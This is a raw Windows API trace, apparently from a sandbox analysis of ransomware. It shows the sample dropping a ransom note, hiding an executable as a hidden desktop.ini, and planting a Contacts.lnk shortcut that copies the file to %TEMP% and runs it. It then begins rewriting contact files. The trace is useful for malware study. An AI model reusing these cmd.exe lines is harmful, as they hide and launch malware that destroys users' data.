CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0217.554] CharUpperBuffW (in: 
lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0217.554] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount2=26) returned 3 [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\CONTACTS\\") returned 0x1a [0217.554] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0217.554] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0217.554] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0217.555] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0217.555] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0217.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.555] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0217.555] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0217.555] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x8c8, dwThreadId=0xc04)) returned 1 [0217.561] CloseHandle (hObject=0x120) returned 1 [0217.561] CloseHandle (hObject=0x1b4) returned 1 [0217.561] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf")) returned 0xffffffff [0217.561] GetLastError () returned 0x2 [0217.561] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0217.564] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\contacts\\bl0cked-readme.rtf")) returned 0x20 [0217.564] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.564] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0217.564] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0217.564] 
CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0217.564] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts\\") returned 0x1a [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0217.564] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0217.564] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Contacts", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Contacts") returned 0x19 [0217.564] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0217.565] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0217.565] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Contacts\"", 
lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe3c, dwThreadId=0xbc4)) returned 1 [0217.624] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0218.486] CloseHandle (hObject=0x1b4) returned 1 [0218.486] CloseHandle (hObject=0x120) returned 1 [0218.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0218.486] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0218.486] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0218.486] GetTickCount () returned 0x3d0b6 [0218.486] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27527572333) returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x79\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x56\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0218.487] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0218.487] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0218.487] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0218.487] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE 
\"CONTACTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0218.487] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0218.487] CoInitialize (pvReserved=0x0) returned 0x0 [0218.487] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0218.488] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0218.488] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0218.488] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\y5l8rlAV.exe\" && \"%TEMP%\\y5l8rlAV.exe\"") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0218.490] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0218.490] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0218.490] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Contacts.lnk", fRemember=0) returned 0x0 [0218.498] ShellLink:IUnknown:Release (This=0x1d3dfc) 
returned 0x2 [0218.498] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0218.498] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0218.498] CoUninitialize () [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0218.499] ReleaseMutex (hMutex=0xf8) returned 1 [0218.499] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27528935531) returned 1 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4eb [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0218.501] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3 [0218.501] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4eb [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4eb [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0218.503] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0218.503] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x274, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x274, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0218.503] WriteFile (in: hFile=0x1b4, lpBuffer=0x1279be8*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1279be8*, lpNumberOfBytesWritten=0x12ec1c*=0x274, lpOverlapped=0x0) returned 1 [0218.503] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-628, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: 